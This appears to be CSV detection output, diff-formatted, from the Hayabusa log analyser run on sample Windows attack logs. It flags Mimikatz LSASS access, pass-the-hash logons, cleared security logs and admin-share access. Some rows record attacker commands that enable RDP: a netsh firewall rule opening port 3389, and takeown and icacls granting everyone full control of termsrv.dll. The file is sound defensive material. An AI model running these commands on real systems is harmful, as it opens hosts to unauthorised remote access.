-2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive 
Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: 
""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx -2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx -2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: 
user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: 
RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:22.284 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 
